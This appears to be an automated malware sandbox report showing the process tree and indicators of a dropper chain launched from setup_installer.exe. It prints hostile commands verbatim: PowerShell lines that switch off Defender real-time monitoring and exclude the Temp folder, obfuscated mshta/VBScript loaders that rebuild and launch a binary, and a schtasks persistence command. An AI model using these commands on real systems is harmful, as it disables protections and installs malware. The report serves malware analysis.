1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 3032 Explorer.EXE 3032 Explorer.EXE 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Wed09e95ff6b5.exerun2.exepid Process 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
Explorer.EXEMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid Process 3032 Explorer.EXE 4268 MicrosoftEdge.exe 5156 MicrosoftEdge.exe 9232 MicrosoftEdgeCP.exe 9480 MicrosoftEdgeCP.exe 9684 MicrosoftEdge.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 1760 wrote to memory of 1380 1760 setup_installer.exe 75 PID 1760 wrote to memory of 1380 1760 setup_installer.exe 75 PID 1760 wrote to memory of 1380 1760 setup_installer.exe 75 PID 1380 wrote to memory of 3620 1380 setup_install.exe 78 PID 1380 wrote to memory of 3620 1380 setup_install.exe 78 PID 1380 wrote to memory of 3620 1380 setup_install.exe 78 PID 1380 wrote to memory of 1348 1380 setup_install.exe 79 PID 1380 wrote to memory of 1348 1380 setup_install.exe 79 PID 1380 wrote to memory of 1348 1380 setup_install.exe 79 PID 1380 wrote to memory of 936 1380 setup_install.exe 80 PID 1380 wrote to memory of 936 1380 setup_install.exe 80 PID 1380 wrote to memory of 936 1380 setup_install.exe 80 PID 1380 wrote to memory of 1500 1380 setup_install.exe 92 PID 1380 wrote to memory of 1500 1380 setup_install.exe 92 PID 1380 wrote to memory of 1500 1380 setup_install.exe 92 PID 1380 wrote to memory of 1288 1380 setup_install.exe 91 PID 1380 wrote to memory of 1288 1380 setup_install.exe 91 PID 1380 wrote to memory of 1288 1380 setup_install.exe 91 PID 1380 wrote to memory of 2540 1380 setup_install.exe 81 PID 1380 wrote to memory of 2540 1380 setup_install.exe 81 PID 1380 wrote to memory of 2540 1380 setup_install.exe 81 PID 1380 wrote to memory of 3756 1380 setup_install.exe 90 PID 1380 wrote to memory of 3756 1380 setup_install.exe 90 PID 1380 wrote to memory of 3756 1380 setup_install.exe 90 PID 1348 wrote to memory of 2988 1348 cmd.exe 89 PID 1348 wrote to memory of 2988 1348 cmd.exe 89 PID 1348 wrote to memory of 2988 1348 cmd.exe 89 PID 3620 wrote to memory of 1428 3620 cmd.exe 88 PID 3620 wrote to memory of 1428 3620 cmd.exe 88 PID 3620 wrote to memory of 1428 3620 cmd.exe 88 PID 1380 wrote to memory of 2308 1380 setup_install.exe 87 PID 1380 wrote to memory of 2308 1380 setup_install.exe 87 PID 1380 wrote to memory of 2308 1380 setup_install.exe 87 PID 1380 wrote to memory of 3836 1380 setup_install.exe 86 PID 1380 wrote to memory of 3836 1380 setup_install.exe 86 PID 1380 wrote to memory of 3836 1380 setup_install.exe 86 PID 936 wrote to memory of 1224 936 cmd.exe 82 PID 936 wrote to memory of 1224 936 cmd.exe 82 PID 1380 wrote to memory of 1876 1380 setup_install.exe 83 PID 1380 wrote to memory of 1876 1380 setup_install.exe 83 PID 1380 wrote to memory of 1876 1380 setup_install.exe 83 PID 1380 wrote to memory of 2208 1380 setup_install.exe 85 PID 1380 wrote to memory of 2208 1380 setup_install.exe 85 PID 1380 wrote to memory of 2208 1380 setup_install.exe 85 PID 1380 wrote to memory of 3740 1380 setup_install.exe 84 PID 1380 wrote to memory of 3740 1380 setup_install.exe 84 PID 1380 wrote to memory of 3740 1380 setup_install.exe 84 PID 1380 wrote to memory of 2296 1380 setup_install.exe 95 PID 1380 wrote to memory of 2296 1380 setup_install.exe 95 PID 1380 wrote to memory of 2296 1380 setup_install.exe 95 PID 2540 wrote to memory of 2392 2540 cmd.exe 93 PID 2540 wrote to memory of 2392 2540 cmd.exe 93 PID 1380 wrote to memory of 2260 1380 setup_install.exe 94 PID 1380 wrote to memory of 2260 1380 setup_install.exe 94 PID 1380 wrote to memory of 2260 1380 setup_install.exe 94 PID 1380 wrote to memory of 2176 1380 setup_install.exe 113 PID 1380 wrote to memory of 2176 1380 setup_install.exe 113 PID 1380 wrote to memory of 2176 1380 setup_install.exe 113 PID 2308 wrote to memory of 3652 2308 cmd.exe 96 PID 2308 wrote to memory of 3652 2308 cmd.exe 96 PID 2308 wrote to memory of 3652 2308 cmd.exe 96 PID 1380 wrote to memory of 3096 1380 setup_install.exe 112 PID 1380 wrote to memory of 3096 1380 setup_install.exe 112 PID 1380 wrote to memory of 3096 1380 setup_install.exe 112
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E656616\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe5⤵
- Executes dropped EXE
PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed096a1bff61.exeWed096a1bff61.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4108 -
C:\Users\Admin\AppData\Roaming\3045238.exe"C:\Users\Admin\AppData\Roaming\3045238.exe"8⤵
- Executes dropped EXE
PID:5360
-
-
C:\Users\Admin\AppData\Roaming\8467150.exe"C:\Users\Admin\AppData\Roaming\8467150.exe"8⤵
- Executes dropped EXE
PID:5544
-
-
C:\Users\Admin\AppData\Roaming\7780882.exe"C:\Users\Admin\AppData\Roaming\7780882.exe"8⤵
- Executes dropped EXE
PID:5636
-
-
C:\Users\Admin\AppData\Roaming\3898642.exe"C:\Users\Admin\AppData\Roaming\3898642.exe"8⤵
- Executes dropped EXE
PID:5836
-
-
C:\Users\Admin\AppData\Roaming\4437894.exe"C:\Users\Admin\AppData\Roaming\4437894.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1228
-
-
C:\Users\Admin\AppData\Roaming\4624655.exe"C:\Users\Admin\AppData\Roaming\4624655.exe"8⤵
- Executes dropped EXE
PID:5104
-
-
C:\Users\Admin\AppData\Roaming\3496843.exe"C:\Users\Admin\AppData\Roaming\3496843.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6116 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:5648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 2489⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
- Executes dropped EXE
PID:4280
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4100
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4588 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4588 -s 15648⤵
- Program crash
PID:5672
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4740 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
- Checks whether UAC is enabled
PID:684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵PID:5156
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵
- Checks whether UAC is enabled
PID:5944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:5720
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:6312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:6468
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:6784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:6812
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
PID:5932
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:4136
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 7968⤵
- Program crash
PID:4516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8168⤵
- Program crash
PID:6124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8448⤵
- Program crash
PID:6128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8008⤵
- Program crash
PID:5896
-
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"7⤵PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:5084
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
PID:6592 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"9⤵
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
PID:5168 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffd8f5ddec0,0x7ffd8f5dded0,0x7ffd8f5ddee010⤵
- Loads dropped DLL
PID:5252 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff785dc9e70,0x7ff785dc9e80,0x7ff785dc9e9011⤵
- Loads dropped DLL
PID:3876
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2016 /prefetch:810⤵
- Loads dropped DLL
PID:7356
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2740 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
PID:7484
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2656 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
PID:7468
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2004 /prefetch:810⤵
- Loads dropped DLL
PID:7348
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1936 /prefetch:210⤵
- Loads dropped DLL
PID:7340
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=3084 /prefetch:810⤵
- Loads dropped DLL
PID:8076
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3388 /prefetch:210⤵PID:8340
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2852 /prefetch:810⤵PID:8844
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2880 /prefetch:810⤵
- Modifies system certificate store
PID:3848
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=3832 /prefetch:810⤵PID:4620
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2832 /prefetch:810⤵PID:200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4172 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4172 -s 15448⤵
- Program crash
PID:6136
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
PID:4540 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:4724
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3280
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:9312
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:9728
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:6256
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:6268
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:6400
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone4⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone5⤵
- Executes dropped EXE
PID:3960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6606⤵
- Program crash
PID:5116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6806⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6486⤵
- Program crash
PID:5432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6646⤵
- Program crash
PID:6124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 9086⤵
- Program crash
PID:4240
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe4⤵PID:3740
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe5⤵
- Executes dropped EXE
PID:2104 -
